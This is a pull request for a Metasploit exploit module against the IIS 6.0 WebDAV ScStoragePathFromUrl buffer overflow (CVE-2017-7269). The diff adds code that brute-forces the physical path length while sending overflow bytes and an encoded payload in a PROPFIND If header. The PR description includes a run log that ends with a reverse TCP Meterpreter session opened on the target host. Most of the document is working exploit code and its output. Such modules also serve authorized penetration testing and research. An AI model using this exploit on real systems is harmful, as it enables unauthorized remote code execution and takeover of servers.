### PR TITLE
add brute force for path length

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -1,8 +1,3 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -12,40 +7,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
+      'Name'           => 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
       'Description'    => %q{
-          Buffer overflow in the ScStoragePathFromUrl function
-          in the WebDAV service in Internet Information Services (IIS) 6.0
-          in Microsoft Windows Server 2003 R2 allows remote attackers to
-          execute arbitrary code via a long header beginning with
-          "If: <http://" in a PROPFIND request, as exploited in the
-          wild in July or August 2016.
-
-          Original exploit by Zhiniang Peng and Chen Wu.
+        Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service
+        in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2
+        allows remote attackers to execute arbitrary code via a long header beginning
+        with "If: <http://" in a PROPFIND request, as exploited in the wild in July
+        or August 2016.
       },
-      'Author'         =>
-        [
-        'Zhiniang Peng', # Original author
-        'Chen Wu',       # Original author
-        'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
-        'firefart', # metasploit module
-        'zcgonvh <zcgonvh@qq.com>' # metasploit module
-        ],
+      'Author'         => [
+        'Zhiniang Peng',                        # original exploit
+        'Chen Wu',                              # original exploit
+        'Dominic Chell <dominic@mdsec.co.uk>',  # original module
+        'zcgonvh <zcgonvh@qq.com>',             # module updates
+        'firefart',                             # module updates
+        'Rich Whitcroft',                       # module updates
+      ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2017-7269' ],
-          [ 'BID', '97127' ],
-          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
-          [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]
+          [ 'CVE', 'CVE-2017-7269'],
+          [ 'BID', '97127'],
+          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit'],
         ],
-      'Privileged'     => false,
-      'Payload'        =>
+      'Privileged' => false,
+      'Payload'    =>
         {
-          'Space'         => 2000,
-          'BadChars'      => "\x00",
-          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
-          'DisableNops'   =>  'True',
+          'Space'          => 2000,
+          'BadChars'       => "\x00",
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'    => 'True',
           'EncoderOptions' =>
             {
               'BufferRegister' => 'ESI',
@@ -54,52 +45,39 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'PrependMigrate' => true,
+          'PrependMigrate' => true
         },
-      'Targets'        =>
+      'Targets' =>
         [
           [
-            'Microsoft Windows Server 2003 R2 SP2',
+            'Microsoft Windows Server 2003 R2',
             {
               'Platform' => 'win',
             },
           ],
         ],
       'Platform'       => 'win',
-      'DisclosureDate' => 'Mar 26 2017',
-      'DefaultTarget' => 0))
+      'DisclosureDate' => 'March 31 2017',
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
-        OptString.new('ServerName', [ true, 'Servername of the Backend Server', 'localhost' ]),
-        OptInt.new('ServerPort', [ true, 'The Port of the Backend Server', 80 ]),
-        OptInt.new('PhysicalPathLength', [ true, "Length of physical path for target (include backslash). Example: C:\\inetpub\\ == 11", 11]),
+        Opt::RPORT(80),
+        OptInt.new('MIN_PATH_LEN', [ true, "Start of brute force for path length", 5 ]),
+        OptInt.new('MAX_PATH_LEN', [ true, "End of brute force for path length", 40 ]),
       ], self.class)
   end
 
   def supports_webdav?(headers)
     if headers['MS-Author-Via'] == 'DAV' ||
-       headers['DASL'] == '<DAV:sql>' ||
-       headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
-       headers['Public'] =~ /PROPFIND/ ||
-       headers['Allow'] =~ /PROPFIND/
+      headers['DASL'] == '<DAV:sql>' ||
+      headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
+      headers['Public'] =~ /PROPFIND/ ||
+      headers['Allow'] =~ /PROPFIND/
       return true
     else
       return false
     end
-  end
-
-  def physical_path_length
-    datastore['PhysicalPathLength']
-  end
-
-  def server_name
-    datastore['ServerName']
-  end
-
-  def server_port
-    datastore['ServerPort']
   end
 
   def check
@@ -119,37 +97,43 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    http_host = "#{server_name}:#{server_port}"
-    vprint_status("Using http_host #{http_host}")
+    unless datastore['VHOST']
+      fail_with(Failure::NoTarget, "You must set VHOST to the name of the IIS website (e.g., example.local)")
+    end
 
-    buf1 = "<http://#{http_host}/"
-    buf1 << rand_text_alpha(114 - physical_path_length)
-    buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
-    buf1 << ">"
-    buf1 << " (Not <locktoken:write1>) <http://#{http_host}/"
-    buf1 << rand_text_alpha(114 - physical_path_length)
-    buf1 << "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"
-    buf1 << payload.encoded
-    buf1 << ">"
+    host_header = datastore['VHOST'] + ":" + datastore['RPORT'].to_s
+    min_len = datastore['MIN_PATH_LEN']
+    max_len = datastore['MAX_PATH_LEN']
 
-    vprint_status("Sending payload")
-    res = send_request_raw(
-      'method' => 'PROPFIND',
-      'headers' => {
-        'Content-Length' => 0,
-        'If' => "#{buf1}"
-      },
-      'uri' => target_uri.path
-    )
-    if res
-      vprint_status("Return Code: #{res.code} - #{res.message}")
-      vprint_status(res.body)
-      if res.code == 502
-        fail_with(Failure::BadConfig, 'Server returned 502: Please try to change PhysicalPathLength and/or ServerName and run the exploit again')
+    min_len.upto(max_len) do |path_len|
+      print_status("Trying path length of #{path_len}...")
+
+      begin
+        buf = "<http://#{host_header}/"
+        buf << rand_text_alpha(114 - path_len)
+        buf << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
+        buf << "> (Not <locktoken:write1>) <http://#{host_header}/"
+        buf << rand_text_alpha(114 - path_len)
+        buf << "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"
+
+        buf << payload.encoded
+        buf << ">"
+
+        res = send_request_raw(
+          'method' => 'PROPFIND',
+          'headers' => {
+            'Content-Length' => 0,
+            'If' => buf,
+          },
+          'uri' => '/'
+        )
+
+        return if session_created?
+
+      # this can happen on failed attempts - ignore and keep bruting
+      rescue ::Errno::ECONNRESET
+        next
       end
-    else
-      fail_with(Failure::Unknown, "Server did not respond")
     end
   end
 end
-


### PR DESCRIPTION
Added brute forcing of path length. The IIS directory is `c:\www\`, hence success on length of 7.

```
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name          Current Setting   Required  Description
   ----          ---------------   --------  -----------
   MAX_PATH_LEN  40                yes       End of brute force for path length
   MIN_PATH_LEN  5                 yes       Start of brute force for path length
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.2.82      yes       The target address
   RPORT         80                yes       The target port (TCP)
   SSL           false             no        Negotiate SSL/TLS for outgoing connections
   VHOST         rwhitcroft.local  no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2

msf exploit(iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 192.168.2.87:4445
[*] Trying path length of 5...
[*] Trying path length of 6...
[*] Trying path length of 7...
[*] Sending stage (957487 bytes) to 192.168.2.82
[*] Meterpreter session 1 opened (192.168.2.87:4445 -> 192.168.2.82:1028) at 2017-04-10 14:45:22 -0400

meterpreter > getpid
Current pid: 968
```